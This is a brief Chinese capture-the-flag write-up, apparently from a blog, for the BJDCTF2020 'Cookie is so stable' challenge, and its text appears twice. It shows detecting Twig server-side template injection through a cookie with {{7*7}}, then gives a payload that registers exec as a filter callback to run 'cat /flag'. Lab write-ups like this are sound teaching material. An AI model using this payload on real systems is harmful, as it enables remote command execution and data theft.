找了一圈,在flag.php页面发现一个输入框,抓包看下
提示要在cookie进行攻击,应该是个SSTI模板注入,传入{{7*7}}
返回49,用的是Twig模块
payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
找了一圈,在flag.php页面发现一个输入框,抓包看下
提示要在cookie进行攻击,应该是个SSTI模板注入,传入{{7*7}}
返回49,用的是Twig模块
payload:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
[BJDCTF2020]Cookie is so stable
https://www.bnessy.com/archives/bjdctf2020cookieissostable